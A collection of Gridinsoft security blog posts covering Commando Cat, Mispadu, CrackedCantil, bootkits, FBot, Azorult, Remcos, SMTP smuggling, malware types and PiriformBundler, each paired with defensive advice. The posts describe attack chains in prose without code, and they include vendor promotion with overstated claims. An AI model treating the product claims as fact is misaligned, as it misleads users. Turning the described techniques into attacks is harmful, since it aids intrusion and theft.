Docker API Vulnerability Exploited

Investigators have discovered a new malware campaign aimed at Docker API endpoints. The malware is called Commando Cat, and its purpose is to take advantage of misconfigured Docker APIs, allowing it to run harmful commands on the affected containers. According to a report, Commando Cat has nine distinct attack modules that can carry out several tasks. These include downloading and executing additional payloads, scanning for open ports and vulnerable services, stealing credentials and sensitive data, mining cryptocurrencies, launching distributed denial-of-service (DDoS) attacks, and spreading to other containers and hosts.

The malware campaign was first detected in January 2024. This marks the second Docker-related campaign identified in 2024, following the previous discovery of the malicious deployment of the 9hits traffic exchange application. Then, specialists observed a spike in malicious activity from a single IP address from China. The researchers traced the source of the attack to a Docker container running on a cloud server infected by Commando Cat. The malware had accessed the Docker API through an exposed port and executed a series of commands to download and run its modules.

Commando Cat Attacks Docker

Commando Cat delivers its payloads to exposed Docker API instances via the Internet. The attacker instructs Docker to fetch a Docker image known as “cmd.cat” from the project “Commando”, which generates Docker images with the necessary commands for execution. This choice of image is likely an attempt to appear benign and avoid suspicion. After creating a container, the attacker uses the “chroot” command to escape from the container onto the host’s operating system. The initial command looks for services “sys-kernel-debugger,” “gsc,” “c3pool_miner,” and “dockercache,” which are all created by the attacker after the infection.

Experts also believe the attacker avoids competing with another campaign by checking for the “sys-kernel-debugger” service. After these checks are passed, the attacker reruns the container with a different command, infecting it by copying specific binaries onto the host. This process involves renaming binaries to evade detection, a common tactic in cryptojacking campaigns. The attacker also deploys various payloads with parameters like “tshd,” “gsc,” and “aws.”

The final payload is delivered as a base64 encoded script. It deploys an XMRig crypto-miner and “secures” the Docker install on the infected host. Next, it removes all containers with a special command, and then it removes all containers without a command containing chroot. It kills other mining services before setting up its miner. Further, malware uses a systemd service to achieve persistence for the XMRig stager. It hides the docker-cache and docker-proxy services using the hid script. Finally, Commando Cat blackholes the Docker registry to eliminate the risk of competition.

Safety Tips

Protecting against a sophisticated threat, like Commando Cat is, appears to be a challenging affair. Its advanced detection evasion methods make it hard to detect for classic security solutions. But there are still enough tricks to make this malware less of a threat.

• Use Firewall. You can configure your firewall for strict packet filtering. Only allow necessary network connections and block all others. You can also limit outbound connections from containers to prevent unauthorized access.
• Employ XDR. Extended Detection and Response systems can analyze network traffic and identify anomalies. Suspicious activity should trigger warnings or alerts about potential intrusions. So, you can utilize network activity monitoring tools to detect unusual traffic related to the Docker API.
• Training and Awareness. Training users on secure Docker usage and basic cybersecurity practices is essential to prevent most problems. Educated users can help prevent social engineering and mishandling of data.

The post Docker API Vulnerability Exploited in Cryptojacking Campaign appeared first on Gridinsoft Blog.

Mispadu Trojan Uses SmartScreen Bypass

The extensive research regarding Mispadu malware done by Unit 42, among other things, underscores the use of a critical vulnerability in Windows to circumnavigate SmartScreen protection. The flaw, known as CVE-2023-36025, was detected and fixed by Microsoft back in November 2023. However, as of early February 2024, there are already several cases of malware exploiting that vulnerability, meaning that users hesitate to install a patch. Earlier, we wrote about a Phemedrone Stealer spreading campaign that uses the same detection evasion approach.

Said flaw is rather easy to exploit, as all that is needed is just a specifically crafted URL file. As such files are considered trusted by Microsoft Defender, the system will not pop up a SmartScreen banner warning about running the potentially dangerous file. In the background, this URL file forces the connection to the command server and downloads the payload in the form of a binary file.

Cybercriminals who stand behind Mispadu commonly use email spam to deliver these crafted URL files. However, other spreading ways may be even more successful, like, for example, sharing the file via social media, as Phemedrone masters do.

What is Mispadu Malware?

Mispadu itself is a rather unique example of a banking trojan that emerged back in 2019. It is distinctive by a peculiar region check method, persistent code encryption, and excessive obfuscation. For instance, to detect whether it runs in a prohibited region or not, it does not use a “traditional” IP address ban list. Instead, Mispadu checks the offset of the current system time from the UTC; it ceases further execution shall the value exceed the set limit.

This financial infostealer targets a range of financial websites, searching for the matches in the browsing history. Once Mispadu finds one present in its target list, it searches for the password in the browser’s AutoFill file and sends it to the command server. As a result, hackers get the full set of credentials related to financial services.

Despite having a flexible solution for targeting different banking and crypto services in different countries, the stealer focuses mainly on ones from both Americas and Western European countries. It is not clear whether such a selection is related to the location of malware masters or other factors.

How to Protect Yourself?

Malware like Mispadu is severe, though can rarely be called unavoidable. It exploits a well-known flaw, that is fixed in the latest Windows updates. There hence, by just updating the system you already demolish the primary injection vector this malware employs.

Nonetheless, it is worth keeping in mind that the file itself makes its way to the target system within a spam email. The latter remains the main propagation method for malware, scams , and phishing attacks. Know how to distinguish between a phishing email and a genuine one – and you will have much fewer chances to get into trouble at all.

Use a reliable anti-malware software as the additional protection layer. Everyone can make a mistake, and that’s completely normal – only those who do nothing will never make one. To get yourself backed up for such cases, I’d recommend using GridinSoft Anti-Malware – a reliable, lightweight, and easy-to-use anti-malware software. Its advanced detection mechanisms will be able to detect and stop any malware at its very beginning.

The post Mispadu Banking Trojan Exploits SmartScreen Flaw appeared first on Gridinsoft Blog.

What is CrackedCantil?

CrackedCantil is a dropper malware discovered and described by the malware analyst LambdaMamba. The name of this malware derives from two parts. “Cracked” for software cracks, is the primary spreading vector, and “Cantil” for the Cantil viper, a species of highly venomous viper, suggesting the malware’s harmful potential​​. By its nature, CrackedCantil is a loader/dropper malware that targets at delivering a lot of different malware samples, including stealers, ransomware, spyware and backdoors.

Overview of distribution ways

The main way to spread such malware is through the use of cracked software. People looking for free versions of paid software often resort to downloading “cracked” versions. These versions are often legitimate software modified to bypass licensing mechanisms. However, attackers use this demand for cracked software as a means to spread malware.

The process begins on questionable websites or forums. After downloading and running what looks like an installer, malware is installed on the user’s computer. This may be disguised as useful files or integrated into the installation executables. Once activated, the malware begins infecting the system, a process that may include several actions. Then it can install additional malware, steal data, encrypt files for ransom, and turn the infected device into part of a botnet.

CrackedCantil Delivers Droppers, Spyware and Ransomware

The tree of processes involved in the incident is quite complicated, and several infamous malware families were found to be involved. Let’s look at these families in the overall threat picture, focusing on the role of each in the symphony of cyberattacks.

PrivateLoader

PrivateLoader works as a polymorphic downloader that uses various obfuscation and packaging techniques to evade detection by antivirus programs. It is written in C++ and is often distributed with cracked software. It is also capable of downloading and executing additional malicious modules from remote control servers. Also, PrivateLoader often includes features to check the execution environment to avoid running in virtual machines or analysis environments, making it difficult for security researchers to investigate and analyze.

SmokeLoader

SmokeLoader, also known as Dofoil, is a “loader” type malware used to spread additional malware such as backdoors, keyloggers, and Trojans. It is also capable of stealing information. SmokeLoader can inject malicious code into system processes, thereby evading detection.

Lumma

Lumma is an infostealer that received quite a bit of attention over the last few months. It can extract personal and financial data from a variety of sources on infected computers, including web browsers, email clients, and cryptocurrency wallet files. Most commonly, Lumma Stealer propagates through social engineering and phishing attacks. It can also evade antivirus detection and transmit collected data to a remote command and control (C&C) server.

RedLine

RedLine Stealer is a malicious program designed to steal various types of sensitive information from infected computers. It is capable of extracting browser credentials, credit card data, e-wallet passwords, and system information. Appeared back in 2020, it has quickly become one of the most popular stealers on the malware market.

Socks5Systemz

Socks5Systemz is a malware that infects devices through PrivateLoader and Amadey. Infected devices are turned into traffic-forwarding proxies for malicious traffic, and the malware connects to its C2 server with a DGA.

STOP/Djvu Ransomware

STOP Ransomware is an encryptor characterized by adding unique extensions to encrypted files and creating ransom text files that contain instructions for the victim on how to make the payment and obtain the decryptor. Also, it encrypts files and adds its extensions to their ends – .hhaz, .cdaz, cdcc, and the like. DJVU is also a variant of the STOP ransomware that can include multiple levels of stealth, making it harder to analyze. STOP/DJVU encrypts files using AES-256 and Salsa20. It is known to collaborate with other malware, such as infostealer malware, to steal sensitive information before encryption.

How dangerous is CrackedCantil?

CrackedCantil is another player on the dropper malware market, but its unique ability to coordinate different types of malware sets it apart from the crowd. It makes a so-called “symphony of malware” where each element is carefully tuned for maximum impact. The growing popularity of CrackedCantil points to its effectiveness, in both detection evasion and malware delivery. Huge distribution through users’ desire to access paid software for free.

To avoid infection through cracked programs, the following precautions are recommended:

• Always purchase software from official vendors or directly from the developers. This not only ensures the legitimacy of your software, but also ensures that you receive all necessary security updates.
• Regularly update all installed programs and the operating system. This helps protect your system from vulnerabilities that can be exploited by malware.
• Use a reliable antivirus solution and scan your system regularly. Modern antivirus programs frequently update their databases to recognize new threats.
• Increase your and your employees’ knowledge of cyber threats and social engineering techniques. Knowing how threats spread can significantly reduce the risk of exposure.

The post CrackedCantil Dropper Delivers Numerous Malware appeared first on Gridinsoft Blog.

What is a Bootkit?

A bootkit is a sophisticated type of malware that starts and operates even before the operating system starts – during the boot process. Unlike many other malware types that target software vulnerabilities or user actions, bootkits embed themselves in the system’s boot process, making them exceptionally challenging to detect and remove.

One of the defining characteristics of a bootkit is its ability to load before the operating system (OS) itself. This gives the attacker a significant advantage, as they can intercept and manipulate the boot process, allowing them to gain control over the system even before the user logs in. Being integrated that close to the bare metal also opens the possibility of exploiting kernel-level vulnerabilities and hardware flaws.

Bootkits vs. Rootkits

While often confused, bootkits and rootkits operate at different levels of a system. Rootkits infect the OS after it loads, granting the max privileges possible to its master. At the same time bootkits are embedded in the system bootloader or even motherboard firmware. This, eventually, changes both the capabilities and the purpose of the bootkit. The two things in common between these two are both being advanced and high-severity threats.

Functionalities of Bootkits

Bootkits are versatile in their malicious functionalities. To understand and combat these malicious entities effectively, we must dissect the intricacies of their functionalities.

• Persistence. One of the primary functionalities of bootkits is their persistence. One of the primary functionalities of bootkits is their persistence. They can implant themselves in the GUID Partition Table (GPT), a more modern system architecture. This positioning allows bootkits to remain active and undetected through system reboots and even full operating system reinstalls, contributing to their prolonged presence and challenging removal from the infected system.
• Data Theft. Some bootkits are engineered to steal sensitive data from the compromised system. During the boot process, they may intercept and exfiltrate data such as login credentials, financial information, personal files, and any other valuable data they can access.
• Backdoor Access. Bootkits can create backdoors within the system, which provide unauthorized remote access to the compromised computer. Adversaries will be able to execute commands, upload additional malware, or manipulate the system as they see fit. It essentially grants them a persistent presence on the compromised device.
• Bypassing security measures. One of the key traits of bootkits is their ability to circumvent security measures. They load themselves into the system’s memory before any security software or antivirus programs have a chance to activate. As a result, they can operate undetected and unimpeded by security tools, allowing them to carry out their malicious activities without being stopped.

Can I detect and remove the bootkit?

Detecting a bootkit before it is injected into the firmware or the first partitions of the hard disk is the most effective way to prevent it from causing damage. However, detecting a bootkit infection is not an easy task, and even if it is detected, removing it can be even more challenging.

If the bootkit has been injected into the EFI partition, only a complete operating system reinstallation can remove the malicious bootkit code from the disk. However, this may not be enough if the malware managed to infect the firmware, which will result in a new system being compromised, too. In such cases, it is advisable to determine which bootkit has infected the system and use special LiveCD antivirus utilities to clean the system of any malicious code.

How to Prevent Bootkits

Preventing bootkit malware requires taking several measures to reduce the risk of infection. Here are some steps that can be taken:

1. Secure Boot and UEFI
   Secure Boot is a feature that is available in UEFI-enabled computers. Its purpose is to ensure that only trusted software is loaded during the boot process. UEFI itself is a more secure and modern technology that allows for a more firm control over the situation. This helps to prevent bootkit malware from infecting the computer. Still, recent developments have shown that the BlackLotus UEFI bootkit can bypass Secure Boot.
2. Update Your System
   Keeping your operating system and security software up-to-date can prevent bootkit malware from infecting your computer. Pay attention to firmware updates as well: although rare, UEFI/BIOS vulnerabilities exist, too, and may be exploited in different scenarios.
3. Use antivirus software
   While antivirus software can’t detect all bootkit malware, it can prevent such an infection in its early stage. Advanced control systems may also be useful for detecting the threats that integrate on such a low level.
4. Be cautious when downloading software
   It is crucial to download software from trusted sources only, especially when we talk about hardware control utilities and drivers. Those two integrate deep enough into the system to allow their exploitation for bootkit injection.
5. Use a hardware-based solution
   Hardware-based solutions, such as a Trusted Platform Module (TPM), can help prevent bootkit malware by ensuring that only trusted software is loaded during the boot process.

The post What is a Bootkit? Explanation & Protection Guide appeared first on Gridinsoft Blog.

FBot Targets AWS, Twilio and Office365

FBot is a Python-based hacking tool that was recently detected by SentinelOne analysts, particularly in its targeting of cloud services and payment platforms. FBot’s primary function is to hijack cloud, SaaS, and web services, with a secondary focus on obtaining accesses for further attacks. Among its most noteworthy features are credential harvesting capabilities, essential for initial access and potentially lucrative through the sale to other cybercriminals. FBot shares some commonalities with typical stealers, particularly in its functionalities related to credential harvesting and account hijacking.

Distinct from other infostealer malware families, FBot does not lean on the commonly used Androxgh0st code. Instead, it carves its unique path, sharing functional and design similarities with the Legion cloud infostealer. Its smaller footprint suggests private development and a targeted distribution strategy. It tops up with its extensive capabilities, including tools for hijacking AWS accounts and credential harvesting for spam attacks. Additionally, it has specialized functions to target PayPal and various SaaS accounts.

AWS Targeting

There are three functions in FBot that are designed specifically for attacking AWS accounts.
Let’s look at each of yb] in more detail:

• AWS API Key Generator
  This function of FBot creates artificial AWS API access keys. Think of it like trying to make duplicate keys for a lock, but without having the original. It randomly generates these keys hoping to guess the correct combination that will give access to an AWS account. Once succeeded, it allows unauthorized users to access the services without the manipulations visible to administrators.
• Mass AWS Checker
  This part of FBot inspects AWS account properties, permissions and services. In particular, it looks into the email configurations of AWS Simple Email Service, focusing on email sending capabilities. Moreover, it takes a step further by trying to set up a new user within the AWS account with administrative access. Such functionality may further be useful for performing massive email spam campaigns.
• AWS EC2 Checker
  One more function checks the AWS EC2 service permissions and capabilities of the compromised account. FBot checks what resources the account has available, which could be useful for someone planning to utilize these resources without authorization. Further use may be different, as spare calculation power has extremely versatile applications.

Exploiting Payment Services and SaaS Platforms

FBot’s targeting of SaaS and Payment Services is multifaceted. It includes a feature for PayPal account validation, termed “paypal_validator,” which checks if an email is linked to a PayPal account. This is executed by sending a request to a hardcoded URL, uniquely utilizing a Lithuanian fashion designer’s website for authentication. This may allow transactions hijacking or similar mischievous activities.

Additionally, FBot targets several SaaS platforms, including Sendgrid and Twilio. For Sendgrid, it has a feature to generate API keys, while for Twilio, it takes input in the form of SID and Auth Token. Similarly to AWS SES, hijacked Sendgrid accounts may further be used in impersonation email scams. Meanwhile, dumping Twilio SID/Auth Token data, malware provides its masters with quite a bit of info regarding the account – currency, balance, connected phone numbers, etc.

Web Framework Vulnerabilities

FBot’s capabilities in targeting web frameworks are particularly focused on exploiting vulnerabilities in various environments. It has a feature for validating if URLs host a Laravel environment file and extracting credentials from these files. This functionality enables FBot to potentially access sensitive configuration information. Additionally, it includes a Hidden Config Scanner, which sends HTTP GET requests to several PHP, Laravel, and AWS-related URIs, looking for stored configuration values. This scanner parses responses for keys and secrets related to a range of services, making it a potent tool for extracting valuable data from compromised web frameworks​​.

Protective Measures

To combat FBot’s threats, it’s crucial to understand its indicators of compromise. These include specific SHA1 hashes and hardcoded AWS IAM usernames and passwords used by FBot. The fight against FBot isn’t just about detection; it’s also about proactive defense.

• Employ comprehensive antivirus solutions that are regularly updated. Modern antivirus software is equipped with advanced detection capabilities to identify and neutralize malware like FBot. These tools often include real-time monitoring, heuristic analysis, and behavior-based detection, which can be particularly effective against new and evolving threats.
• FBot may use spamming tactics or exploit network vulnerabilities to gain entry. For spam protection, a robust firewall acts like a vigilant gatekeeper, monitoring and controlling incoming and outgoing network traffic based on predetermined security rules. By setting up appropriate firewall rules, you can effectively block malicious traffic and unauthorized access attempts, reducing the risk of FBot infiltrating your network.
• Organizations are advised to enable multi-factor authentication (MFA) for AWS services and set up alerts for any unusual activities, such as the creation of new user accounts or significant changes in SaaS configurations.

The post Novice FBot Stealer Targets Cloud Services appeared first on Gridinsoft Blog.

Azorult Malware Resurfaces After 2 Years

A recent research in the cyber threat landscape has brought to light concerning news about the Azorult malware. First identified in 2016, this malware gained quite an image back in the days>. Among its most noticeable campaigns is spreading together with STOP/Djvu ransomware. However, its activity was declining since early 2020, with activity curve going flat in late 2021.

Being a stealer malware from the mid-10’s, it originally carried functionality that suited the times. Azorult specializes in stealing sensitive information. It includes things such as browsing history, cookies, and login credentials. No crypto wallets, no session and 2FA tokens – those were not that valuable back in the days.

Among the key news of the resurfaced version are more sophisticated and stealthy methods, which could make it very difficult to detect. It also uses a new infection chain and uses RAM as a springboard for deploying and executing the entire payload. Researchers stumbled upon shortcut files masquerading as PDF files, eventually leading to Azorult infecting the device. As for the distribution method, experts suggest using classic means like email phishing.

What is Azorult Malware?

The Azorult malware is a spyware that can steal various data types, including credentials for applications and cryptocurrencies. It is known for its capabilities in harvesting sensitive data from infected systems. Azorult can also download and execute additional payloads, increasing its threat to compromised systems.

In its latest variant, Azorult uses process injection and “Living Off the Land” (LotL) techniques to evade detection by security tools and is primarily sold on Russian underground hacker forums. Data stolen with Azorult is also sold on Russian Dark Web marketplaces. In addition to stealing information, >the malware captured data for a service that sells ready-made virtual identities. This included as much detailed data as possible about users’ online behavior: history of website visits, information about the operating system, browser, installed plugins, etc.

In particular, researchers found that 90% of all digital footprints provided on an infamous Genesis Market were associated with Azorult. However, in February 2020, Google released a Chrome update that enforced the use of AES-256 for password encryption. This affected Azorult ability to retrieve passwords from Chrome. As the development of AZORult was discontinued in 2018, this release was concidered a “death” of AZORult, impacting Genesis’s business as well.

Azorult Uses Email Spam and LNK Files

The reviewed example of Azorult, as I mentioned above, came as an .lnk file disguised as a PDF document through the double extension tricks. A file named citibank_statement_dec_2023.lnk triggers a sequence of events that downloads and executes a JavaScript file from a remote server. The JavaScript file downloads two PowerShell scripts, one of which retrieves an executable file and initiates a new thread to execute the injected code. The loader file terminates if the user’s language code matches specific codes linked to Russia – the most probable region of its developers. The final payload is, obviously, the Azorult infostealer.

Upon execution, it generates a unique identifier for the victim and collects system information, including crypto wallets. Azorult terminates execution if certain conditions are met, such as the presence of a mutex or a file named “password.txt” on the Desktop. It also checks for specific machine names and usernames on the victim’s system. If any of the checks return true, the binary terminates. Azorult captures screenshots and targets multiple applications. The data is compressed, encrypted, and sent to a remote server.

Safety Recommendations

Since human error is mostly to blame, the most important recommendation is to beware of phishing. To elaborate, the following points will be helpful:

• Unsolicited Emails. Always be skeptical and cautious of emails from unknown sources. Especially those that request personal information or urge you to click on a link.
• Verify Email Sources. Before responding or clicking any links, verify the sender’s email address and ensure it’s legitimate. Don’t click on links in emails, especially if they seem suspicious or too good to be true.
• Educate Yourself. Stay informed about phishing methods and various phishing-based scam techniques.

The post AzorUlt Stealer Is Back In Action, Uses Email Phishing appeared first on Gridinsoft Blog.

Remcos RAT Uses Webhards to Spread

Recent research of South Korean cybersecurity firm AhnLab shares its observations regarding a new Remcos RAT spreading campaign. The company names Webhards as a source of choice for this malware to infiltrate user devices. Webhards is a file sharing platform, popular among computer pirates and people who seek free content. It may be used for legitimate purposes, though a selection of analysts name it a popular source of malware, along with torrents.

In the case of Remcos RAT, hackers use “hot topics” – either adult content or cracked versions of new games to make the user download the infected package. Then, the publication on the aforementioned site asks to run a Game.exe file, that is present in the downloaded archive. Upon running the executable file, a chain of VBS scripts are executed to download the final payload.

Upon downloading, another set of scripts injects Remcos into a system process called ServiceModelReg.exe. This is a built-in console utility that is, in fact, used only during the system installation and has no further application. Well, until this instance of Remcos finds its way to the machine, apparently.

What is Remcos RAT?

Remcos is a remote access trojan, marketed as a legit remote access tool by German firm BreakingSecurity. Released in 2019, it has become particularly popular in 2020 and 2021, when threat actors were using Covid-themed emails to spread it. Later though, its activity has become much more moderate, averaging at 30 samples per day during 2023.

For functionality, this malware is a classic example of RAT: Remcos provides full-featured remote access to the infected system, including access to system menus and file system. Additionally, it is capable of recording the screen, taking screenshots and setting the activity alarm. To identify target systems from each other, malware collects some basic information – OS version, date, time, and some basic hardware info.

How to protect against threats?

By looking at the ways the malware spreads you can already get the answer on how to protect yourself. In the case of Remcos, the obvious answer is to avoid cracked software. As it is not just a malware risk but also a copyright infringement, avoiding it is pretty much recommended. This is especially relevant for websites that are known for being used for malware distribution.

For an additional, passive layer of protection, you can have anti-malware software running in the background. A modern, well-stocked antivirus can protect you from any attack, regardless of the type of malware. GridinSoft Anti-Malware is the one you can rely on – its detection system offers exceptional protection in both proactive and reactive approaches.

The post Remcos RAT Targets South Korean Users Through Webhards appeared first on Gridinsoft Blog.

What is SMTP Smuggling?

SMTP smuggling is a novice exploitation technique that manipulates the SMTP, a protocol used globally for sending emails since the inception of the Internet. This technique takes advantage of the differences in how outbound and inbound SMTP servers interpret the end-of-data sequence. It allows attackers to insert arbitrary SMTP commands and potentially send separate emails​​​​​​.

The core of SMTP smuggling lies in the discrepancies between how different servers handle the end-of-data sequence (<CR><LF>.<CR><LF>). By exploiting these differences, attackers can break out of the standard message data, smuggling in unauthorized commands. This technique requires the inbound server to accept multiple SMTP commands in a batch, a feature commonly supported by most servers today​​​​​​.

In-depth research into this vulnerability has revealed that SMTP servers of prominent email providers like Microsoft, GMX, and Cisco are susceptible to this exploit. While Microsoft and GMX have addressed these issues, Cisco has categorized the findings as a feature rather than a vulnerability, choosing not to alter the default configuration. Consequently, SMTP smuggling remains possible in Cisco Secure Email instances under default settings​​​​. Subsequently, the vulnerability was also identified in Microsoft’s Outlook SMTP server, further expanding the threat landscape​​.

What is the danger of SMTP vulnerability?

The implications of SMTP smuggling are far-reaching and alarming. Attackers can use this method to send forged emails that appear to be from credible sources, thereby circumventing checks designed to authenticate incoming messages, such as DomainKeys Identified Mail (DKIM), Domain-based Message Authentication, Reporting and Conformance (DMARC), and Sender Policy Framework (SPF)​​.

In simple words, using this trick, frauds will be able to reach the corporate emails that were not receiving any spam before. Sure, the companies which opted for this security method are most likely aware of the dangers and have other protection methods running. But the very fact of them being exposed, too, creates a much bigger risk of cyberattacks.

Mitigating the effects of vulnerability

To mitigate the risks posed by SMTP smuggling, experts recommend several best practices. For Cisco users, changing settings from “Clean” to “Allow” is advised to avoid receiving spoofed emails with valid DMARC checks​​. Additionally, all email service providers and users should remain vigilant, regularly updating their systems and staying informed about the latest security developments.

Regularly monitor for unusual server activity and review security logs to detect potential breaches. Educate users about phishing and encourage skepticism about emails from unknown senders. Finally, consider consulting with cybersecurity professionals for advanced protective measures tailored to your specific infrastructure.

The post SMTP Smuggling is a New Threat to Email Security appeared first on Gridinsoft Blog.

Let’s start by understanding what malware is. Malware is malicious software that can harm your computer and data. Some potentially unwanted or malicious applications, also, may not show any signs of danger and are rated by anti-malware vendors based on their own opinions. Hack tools can also considered malicious because someone can use them to hack computer networks. In addition, Antivirus software often blocks them as if they were active viruses.

Loader

Loader malware, also known as downloader or dropper, is a type of malicious software designed to deliver other types of malware to the targeted system. These droppers often have the capability to form botnets, which are networks of computers that a single command center can control. Once activated, these botnets can deploy any kind of malware, ranging from adware and browser hijackers to spyware and ransomware.

However, for the droppers to work, they must first infiltrate the targeted system. Email spam is one of the most common methods of spreading this malware. However, this malware is usually targeted towards individual users rather than corporate networks, so methods like software cracks and adware are also used.

Loader (droppers) examples in 2024

• Amadey
• BatLoader
• BazarLoader
• TrickBot
• QakBot

Stealer

Stealer malware, often referred to as “information stealers,” is a type of malicious software designed to extract sensitive information from infected systems. This information can include a wide range of data such as login credentials, financial information, personal identification details, and more.

Key Characteristics of Stealer Malware

Common Types of Stealer Malware

Remote Access Trojan (RAT)

A Remote Access Trojan (RAT) is a type of malware that allows a hacker to control a victim’s computer remotely. This control is often comprehensive and can steal information, spy on the user’s activities, or distribute other malware. RATs are particularly dangerous because they provide the attacker with unauthorized access to the victim’s system, often without the user’s knowledge.

Characteristics of RATs

RAT Malware Types

Ransomware

Ransomware is a malicious program that injects into your computer and encrypts your files. Once your files are encrypted, the attacker demands a ransom payment to restore access to your data. Some ransomware may also threaten to delete your files or expose sensitive information if the ransom is not paid. Although the first threat is often false, the second threat can be real as ransomware is frequently spread alongside spyware or stealers.

Characteristics of Ransomware

Types of Ransomware

Trojan

Trojan virus is a type of malicious software that disguises itself as a legitimate program or file, tricking users into downloading and installing it. Once activated, a Trojan can perform a variety of harmful actions on the victim’s computer. Also, trojans can take various forms like applications, documents, and scripts, exploiting the system and performing actions like disabling security software, modifying system settings, and stealing personal information. In conclusion, they are typically spread through deceptive methods like phishing emails, fake software updates, or illegitimate tools.

Common Trojan Virus Types

Installer malware

Installer malware is a type of unwanted software that disguises itself as legitimate installation programs for applications or updates. Also, these deceptive installers trick users into downloading and executing them, appearing to be trustworthy software installers. Once the user allows it to run, this malware will download and run numerous unwanted programs. Therefore, installers are sometimes used to monetize free or cracked software.

Types of Installer Malware include

Keylogger

A keylogger is a type of surveillance technology used to record keystrokes made by a user. The purpose of keyloggers can vary from benign to malicious, depending on their use. They are often used in corporate and legal environments to track employees’ and users’ activities for various reasons, such as security or compliance. However, in the context of malware, keyloggers are used to steal sensitive information like passwords, financial data, and personal messages.

Types of Keyloggers

How can I protect my computer from malware?

Protecting your computer from malware involves a combination of software solutions, safe computing practices, and regular maintenance. Although there are basic tips for protecting yourself from malware, such as: regular updates, strong passwords, secure networks, limit software installation. But Anti-malware tools are highly effective against various types of viruses.

You can be careful for a long time, but eventually you may end up downloading malware to your computer without realizing it. We recommend GridinSoft Anti-Malware, which can save you the stress and financial cost of fighting malware.

The post Seven Common Types of Malware – Analysis & Description appeared first on Gridinsoft Blog.

What is PUABundler:Win32/PiriformBundler?

PiriformBundler is a detection name for unwanted software developed by Piriform. Microsoft assigns such names to denote a group of malware or unwanted software with common traits. Other malware with similar naming conventions may share functionality or code solutions, while those labeled PiriformBundler share the same developer.

But why are they unwanted? Major cybersecurity vendors, along with Microsoft, classify software bundles as unwanted. Piriform used to monetize their free versions by adding other software to installations, meeting the criteria of bundled software.

Aside from that, Piriform software is not particularly effective. While it performs positive actions in the system, its overall effectiveness often falls short, bordering on a placebo effect.

Threat Summary

To have a more clear understanding of what the PUA:Win32/PiriformBundler is, let’s analyze one of the apps detected as PiriformBundler and see what exactly makes it so unpleasant.

PUABundler:Win32/PiriformBundler Analysis

Finding a sample for this analysis is straightforward – any program from the Piriform website will suffice. I chose Defraggler for this analysis, a disk defragmentation utility available in both free and paid versions.

Despite its appearance as a defragmentation tool, the program’s effectiveness is questionable. After two consecutive defrags, it reported about 9% defragmentation, revealing an objective lack of effectiveness.

Subsequent analysis demonstrates that the program, while identifying fragmented files, takes no action to address them. This lack of effectiveness raises concerns about its overall utility.

Is PiriformBundler Dangerous?

As indicated by the analysis, it is not as dangerous as malware. While not inherently harmful, Piriform software’s lack of effectiveness makes it less desirable. If you encounter it without consent, running a scan with GridinSoft Anti-Malware is recommended.

It is most likely safe to have such programs on your PC. But if you never installed them, or suspect that it appeared without your consent, then run a scan with GridinSoft Anti-Malware. This program will uncover malicious programs that may potentially be present in the system.

How to protect against PiriformBundler and unwanted programs?

It is not that easy to understand whether the program is legitimate or not. The notification from Microsoft Defender is mostly informational – as you can see, even being marked as PUA does not mean the program is dangerous to use. Though, some of such apps may be rather dangerous to run, due to their malignant nature or just poor design.

By using only reliable and well-reviewed sources, you can weed out the majority of unwanted programs. Forum advice, advertisement on a shady website – such places are not ideal for finding benign and effective software. When you expect it to solve your problems – well, take your time and see user testimonials. The Internet remembers everything, so it will not be possible to hide the truth if you’re persistent enough.

Have reliable anti-malware software running in the system. This will not only protect your system from malware intrusion but also help you understand whether the detected unwanted program is dangerous or not. Using GridinSoft Anti-Malware, you will also be protected from the newest threats and online fraud, thanks to its advanced scanning capabilities.

The post PUABundler:Win32/PiriformBundler appeared first on Gridinsoft Blog.